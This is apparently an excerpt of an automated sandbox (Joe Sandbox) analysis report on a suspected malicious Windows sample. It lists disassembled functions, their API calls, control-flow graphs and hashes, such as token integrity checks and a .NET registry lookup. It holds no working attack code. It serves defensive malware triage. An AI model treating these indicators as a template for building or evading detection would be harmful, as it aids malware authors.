                                                                    • Opcode Fuzzy Hash: 9723ee28a08b59f7e4bedd5523078f5c20cff655ee0fbd42c0b272cb58bf5b6b
                                                                    • Instruction Fuzzy Hash: DC310131D6912CABCB54EBA4DC9DADDB3B8AF24304F9001D9E409A2191EF345B99CF51
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0022635A Relevance: 9.1, APIs: 6, Instructions: 141COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 106 22635a-2263cc call 23d66e VariantInit 111 2263d2-2263e3 106->111 112 226481-22648a 106->112 113 226400-226423 111->113 114 2263e5-2263fd IUnknown_QueryInterface_Proxy 111->114 115 226492-2264ad VariantClear * 2 112->115 116 22648c-22648e 112->116 122 226425-226427 113->122 123 22642b-22642d 113->123 114->113 117 2264b5-2264bc call 23d618 115->117 118 2264af-2264b1 115->118 116->115 118->117 122->123 124 226470-226479 123->124 125 22642f-22643e 123->125 124->112 126 22647b-22647e IUnknown_Release_Proxy 124->126 127 226443-226447 125->127 126->112 128 226449-22645b 127->128 129 22645f-226468 127->129 128->129 132 22645d 128->132 129->124 130 22646a-22646c 129->130 130->124 132->129
                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 00226361
                                                                    • VariantInit.OLEAUT32(?), ref: 0022639E
                                                                    • IUnknown_QueryInterface_Proxy.RPCRT4(?,00246EC8,?), ref: 002263F1
                                                                    • IUnknown_Release_Proxy.RPCRT4(?), ref: 0022647E
                                                                    • VariantClear.OLEAUT32(?), ref: 0022649C
                                                                    • VariantClear.OLEAUT32(?), ref: 002264A2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$ClearProxyUnknown_$H_prolog3_InitInterface_QueryRelease_
                                                                    • String ID:
                                                                    • API String ID: 350923872-0
                                                                    • Opcode ID: 051ba6edebc75fffbb67694e3e9664af0920d2dd68c5a7dcd4f7046b0708b1c2
                                                                    • Instruction ID: 8b7784279add6cd4c45eb573e55b1dd17fe41226b1a825db2c218d56cd1d3e3b
                                                                    • Opcode Fuzzy Hash: 051ba6edebc75fffbb67694e3e9664af0920d2dd68c5a7dcd4f7046b0708b1c2
                                                                    • Instruction Fuzzy Hash: D85191B5E00209EFDB10DFE4D888AAEBBB9AF89700F148059E545EB250DB759E01CB61
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0022660B Relevance: 9.1, APIs: 6, Instructions: 90COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 133 22660b-226632 IUnknown_QueryInterface_Proxy 134 226638-22668c SysFreeString 133->134 136 226694-2266c4 VariantClear * 4 134->136 137 22668e-226690 134->137 138 2266c6-2266c8 136->138 139 2266cc-2266d5 136->139 137->136 138->139 140 2266d7-2266d9 139->140 141 2266dd-2266e4 call 23d618 139->141 140->141
                                                                    APIs
                                                                    • IUnknown_QueryInterface_Proxy.RPCRT4(?,00246ED8,?), ref: 00226617
                                                                    • SysFreeString.OLEAUT32(?), ref: 0022667D
                                                                    • VariantClear.OLEAUT32(?), ref: 002266A1
                                                                    • VariantClear.OLEAUT32(?), ref: 002266AA
                                                                    • VariantClear.OLEAUT32(?), ref: 002266B3
                                                                    • VariantClear.OLEAUT32(?), ref: 002266B9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: ClearVariant$FreeInterface_ProxyQueryStringUnknown_
                                                                    • String ID:
                                                                    • API String ID: 3803624483-0
                                                                    • Opcode ID: 8a0536f5bd30f30ead1afaba3ea001934a8a11eb16a64af92e3da44165cd0771
                                                                    • Instruction ID: 5b65c0923576c1bbe234c8e9a34753742150385e2562d7768b8743571b16b23f
                                                                    • Opcode Fuzzy Hash: 8a0536f5bd30f30ead1afaba3ea001934a8a11eb16a64af92e3da44165cd0771
                                                                    • Instruction Fuzzy Hash: 39314F72D006199FDF01EFF4D8486AFBBBAAF4A300F144489E815EB250CA769A05CF91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 002262D8 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 144 2262d8-226302 GetCurrentProcess OpenProcessToken 145 226304-226318 GetLastError 144->145 146 22631a-226331 GetTokenInformation 144->146 147 22633c-226340 145->147 146->145 148 226333-226339 146->148 149 226342-226345 CloseHandle 147->149 150 22634b-226359 call 22a3ad 147->150 148->147 149->150
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32 ref: 002262E9
                                                                    • OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 002262FA
                                                                    • GetLastError.KERNEL32 ref: 00226304
                                                                    • GetTokenInformation.KERNELBASE(00000000,00000012(TokenIntegrityLevel),?,00000004,?), ref: 00226329
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00226345
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: ProcessToken$CloseCurrentErrorHandleInformationLastOpen
                                                                    • String ID:
                                                                    • API String ID: 2078281146-0
                                                                    • Opcode ID: e3ebd1081c542d05d7b101d331c14c4962d0b8d310c50a944d74d89febbf9370
                                                                    • Instruction ID: 0f49485f674e08374818e53457ec8220168a3859c34e4c3a53709e30fb4cbcdd
                                                                    • Opcode Fuzzy Hash: e3ebd1081c542d05d7b101d331c14c4962d0b8d310c50a944d74d89febbf9370
                                                                    • Instruction Fuzzy Hash: 60015A39A14219EFDB00DFE4ED8DBBEB7B8BB04705F4044A9A502D20A1DB749958DA61
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0022AA90 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 50COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 153 22aa90-22aaa9 call 22b16e 158 22aaab-22aab4 call 22a7e9 153->158 159 22aabe-22aad3 call 22af3f call 2321db call 227326 153->159 158->159 165 22aab6-22aabd call 23165e 158->165 170 22aad8-22aae5 call 22af78 159->170 165->159 174 22aae7 call 231639 170->174 175 22aaec-22ab45 call 22a89a 170->175 174->175
                                                                    APIs
                                                                    • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 0022AAAC
                                                                    • ___scrt_uninitialize_crt.LIBCMT ref: 0022AAEF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: ___scrt_is_nonwritable_in_current_image___scrt_uninitialize_crt
                                                                    • String ID: PWh$Mk
                                                                    • API String ID: 2554503057-1383596220
                                                                    • Opcode ID: f27c34e79de8b5389076cb190db56de77c9eeb09e8a23634b1a6265c76cc78e0
                                                                    • Instruction ID: 6bfe1ea76b592f4323446d6d37d900421d4652831466b151e63205c5a1434f1e
                                                                    • Opcode Fuzzy Hash: f27c34e79de8b5389076cb190db56de77c9eeb09e8a23634b1a6265c76cc78e0
                                                                    • Instruction Fuzzy Hash: FFF04972524331BBCA317FF07A17E2EA3699F81720F10082AF8815B9D2DE264C318D56
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0022115F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54registryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 180 22115f-221197 call 221dff 183 221199-2211c0 RegQueryValueExW 180->183 184 2211dc-2211f3 call 221e76 call 22a3ad 180->184 183->184 186 2211c2-2211c6 183->186 186->184 187 2211c8-2211cc 186->187 187->184 189 2211ce-2211d8 call 2211f4 187->189 189->184 194 2211da 189->194 194->184
                                                                    APIs
                                                                    • RegQueryValueExW.KERNELBASE(?,Release,00000000,?,?,?,80000002,SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full,00020019), ref: 002211B8
                                                                    Strings
                                                                    • Release, xrefs: 002211B0
                                                                    • SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full, xrefs: 0022117A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: QueryValue
                                                                    • String ID: Release$SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full
                                                                    • API String ID: 3660427363-1765340461
                                                                    • Opcode ID: 93f55fa42e33af7206cfb72b1750cda27c6ae511e60ec877e6fbef91419db110
                                                                    • Instruction ID: 3477fdcfb420336f010391861e5695e954e91c58081f1fb3dd5ee633f53fab66
                                                                    • Opcode Fuzzy Hash: 93f55fa42e33af7206cfb72b1750cda27c6ae511e60ec877e6fbef91419db110
                                                                    • Instruction Fuzzy Hash: 52113C74E1032EAFDB04DFD5EC81EEEB7B8EB15744F00446EE905A2241EA709A35CB95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 002264BD Relevance: 3.0, APIs: 2, Instructions: 49COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 203 2264bd-2264df call 23d66e call 22635a 208 226521-22652a 203->208 209 2264e1-2264ff 203->209 210 226532-226539 call 23d618 208->210 211 22652c-22652e 208->211 215 226511-226519 209->215 216 226501-22650f IUnknown_QueryInterface_Proxy 209->216 211->210 215->208 217 22651b-22651d 215->217 216->215 217->208
                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 002264C4
                                                                      • Part of subcall function 0022635A: __EH_prolog3_GS.LIBCMT ref: 00226361
                                                                      • Part of subcall function 0022635A: VariantInit.OLEAUT32(?), ref: 0022639E
                                                                      • Part of subcall function 0022635A: IUnknown_QueryInterface_Proxy.RPCRT4(?,00246EC8,?), ref: 002263F1
                                                                    • IUnknown_QueryInterface_Proxy.RPCRT4(?,00246EE8), ref: 0022650D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog3_Interface_ProxyQueryUnknown_$InitVariant
                                                                    • String ID:
                                                                    • API String ID: 2261498493-0
                                                                    • Opcode ID: d25c33c8374788fcd8059455f1ae10df633e62f5f84f9452495a6d43dc98cf09
                                                                    • Instruction ID: f0ed408905b9590c6db6b104e8d0e5d5445de93e6180fd33bf897dd1a10dc2ad
                                                                    • Opcode Fuzzy Hash: d25c33c8374788fcd8059455f1ae10df633e62f5f84f9452495a6d43dc98cf09
                                                                    • Instruction Fuzzy Hash: 3711A172E11216AFCB14DFE8D4899AFBBB4AF45710F544298E905EB240CB30DE11CBA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0023692F Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 218 23692f-23693c call 23479b 220 236941-23694c 218->220 221 236952-23695a 220->221 222 23694e-236950 220->222 223 23699d-2369ab call 23363a 221->223 224 23695c-236960 221->224 222->223 225 236962-236997 call 234b2e 224->225 230 236999-23699c 225->230 230->223
                                                                    APIs
                                                                      • Part of subcall function 0023479B: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00233374,00000001,00000364,00000006,000000FF,?,002311CD,?,00000004,00000000,?,?), ref: 002347DC
                                                                    • _free.LIBCMT ref: 0023699E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateHeap_free
                                                                    • String ID:
                                                                    • API String ID: 614378929-0
                                                                    • Opcode ID: 4a468a5df08eb0c39ee0081248d001202a8e28e517d3b868daca96c5385feade
                                                                    • Instruction ID: d5ce5842c5fdf16e31dbea679a03824fe5a90a1d9712dbe54223f8bf25b39f5d
                                                                    • Opcode Fuzzy Hash: 4a468a5df08eb0c39ee0081248d001202a8e28e517d3b868daca96c5385feade
                                                                    • Instruction Fuzzy Hash: 46014EB26143566BC320DF59C885A99FBACFB05370F114269F559A76C0D7706D20CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00221DFF Relevance: 1.6, APIs: 1, Instructions: 51registryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 231 221dff-221e21 232 221e23-221e33 call 221d9c 231->232 233 221e35-221e41 RegOpenKeyExW 231->233 235 221e47-221e4b 232->235 233->235 237 221e64-221e73 call 22a3ad 235->237 238 221e4d-221e61 call 221e76 235->238 238->237
                                                                    APIs
                                                                    • RegOpenKeyExW.KERNELBASE(00000000,00020019,00000000,?,00000000,?,?,?,?,?,00221195,80000002,SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full,00020019), ref: 00221E41
                                                                      • Part of subcall function 00221D9C: GetModuleHandleW.KERNEL32(Advapi32.dll,?,?,?,00221E33,00000000,00020019,?,?,00000000,?,?,?,?,?,00221195), ref: 00221DAE
                                                                      • Part of subcall function 00221D9C: GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 00221DBE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleOpenProc
                                                                    • String ID:
                                                                    • API String ID: 1337834000-0
                                                                    • Opcode ID: 50edae767568a8b137df58ac0df65711e5f61b9e72bcc97ede78848decf0b235
                                                                    • Instruction ID: 222e223b9b734dd6cc16b24ad190a6ffd833ce315600c0bb74737428807c641a
                                                                    • Opcode Fuzzy Hash: 50edae767568a8b137df58ac0df65711e5f61b9e72bcc97ede78848decf0b235
                                                                    • Instruction Fuzzy Hash: 84012D75A11229BBDB08CF95EC55EAFB7A8EF59714F01805DB80597240DA74AD208B90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0023479B Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 243 23479b-2347a6 244 2347b4-2347ba 243->244 245 2347a8-2347b2 243->245 247 2347d3-2347e4 RtlAllocateHeap 244->247 248 2347bc-2347bd 244->248 245->244 246 2347e8-2347f3 call 22e15c 245->246 253 2347f5-2347f7 246->253 249 2347e6 247->249 250 2347bf-2347c6 call 2323d1 247->250 248->247 249->253 250->246 256 2347c8-2347d1 call 231200 250->256 256->246 256->247
                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00233374,00000001,00000364,00000006,000000FF,?,002311CD,?,00000004,00000000,?,?), ref: 002347DC
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: b17b6286d07340f4acddba8caa585dff48ea2b1b0362ae42d53de704f3852937
                                                                    • Instruction ID: 8f8d26420d1830ee5ffe46e555cb88a24e7d22ed19dbf27027d72f968d4e4dd6
                                                                    • Opcode Fuzzy Hash: b17b6286d07340f4acddba8caa585dff48ea2b1b0362ae42d53de704f3852937
                                                                    • Instruction Fuzzy Hash: F0F0B471630225A79B213E62AC05A5BB78C9B43BA0F1642A2AC18DB180CB60FC7186E0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00229CA9 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 269 229ca9-229cae 270 229c8e-229c96 call 22a090 269->270 272 229c9b-229c9c 270->272 272->269
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00229C96
                                                                      • Part of subcall function 0022A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0022A09B
                                                                      • Part of subcall function 0022A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0022A103
                                                                      • Part of subcall function 0022A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0022A114
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                    • String ID:
                                                                    • API String ID: 697777088-0
                                                                    • Opcode ID: 21b90571c7be3c15241a5bdfc517d09a1ef9cc6f626fffd4301a873bb2344983
                                                                    • Instruction ID: b6e5db898304ae5734f9459b4ed819d624b15b439faaab535fcb79d545d4ac86
                                                                    • Opcode Fuzzy Hash: 21b90571c7be3c15241a5bdfc517d09a1ef9cc6f626fffd4301a873bb2344983
                                                                    • Instruction Fuzzy Hash: AFB012C22BC2217E315EB2947C02E3A028CE1C4F10370492BF400C9440D8800CB40133
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00229CB3 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00229C96
                                                                      • Part of subcall function 0022A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0022A09B
                                                                      • Part of subcall function 0022A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0022A103
                                                                      • Part of subcall function 0022A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0022A114
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                    • String ID:
                                                                    • API String ID: 697777088-0
                                                                    • Opcode ID: 4e6bfc0c72c4543a3fb7921484ccdb0ba8c9f5eb2fe0560c67b0ec87dcc90ebe
                                                                    • Instruction ID: fc9f70e50b77d013e14af8af2756c1d13b6d3b79efb7adf748677083c130283e
                                                                    • Opcode Fuzzy Hash: 4e6bfc0c72c4543a3fb7921484ccdb0ba8c9f5eb2fe0560c67b0ec87dcc90ebe
                                                                    • Instruction Fuzzy Hash: BCB012C62BC1217E315EB2A47C02E3A028CE2C4F103708C2BF800C9440D8800C740033
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00229CBD Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00229C96
                                                                      • Part of subcall function 0022A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0022A09B
                                                                      • Part of subcall function 0022A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0022A103
                                                                      • Part of subcall function 0022A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0022A114
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                    • String ID:
                                                                    • API String ID: 697777088-0
                                                                    • Opcode ID: ef26178d5dba1e165327a08c6b38ca26cdb70e98eca038cd17fd123b0d6cbd56
                                                                    • Instruction ID: bd306cfe60c988b3ade222d9f2eb6b5143a2ff89265ae078e5c9458c06a09e8b
                                                                    • Opcode Fuzzy Hash: ef26178d5dba1e165327a08c6b38ca26cdb70e98eca038cd17fd123b0d6cbd56
                                                                    • Instruction Fuzzy Hash: 81B012C32BC1217E315EB2947C02E3A028CF1C4F10370482BF400C9440D8800C740033
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00229C84 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 259 229c84-229c89 260 229c8e-229c96 call 22a090 259->260 262 229c9b-229cae 260->262 262->260
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00229C96
                                                                      • Part of subcall function 0022A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0022A09B
                                                                      • Part of subcall function 0022A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0022A103
                                                                      • Part of subcall function 0022A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0022A114
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                    • String ID:
                                                                    • API String ID: 697777088-0
                                                                    • Opcode ID: e149335cb8187d6496ef1d0bc65c27a8ea814403434a103aa7099f34fced37de
                                                                    • Instruction ID: c88531be81a62f1e569a9392198714ad03f147e30fbdc12a3a72fb446642392d
                                                                    • Opcode Fuzzy Hash: e149335cb8187d6496ef1d0bc65c27a8ea814403434a103aa7099f34fced37de
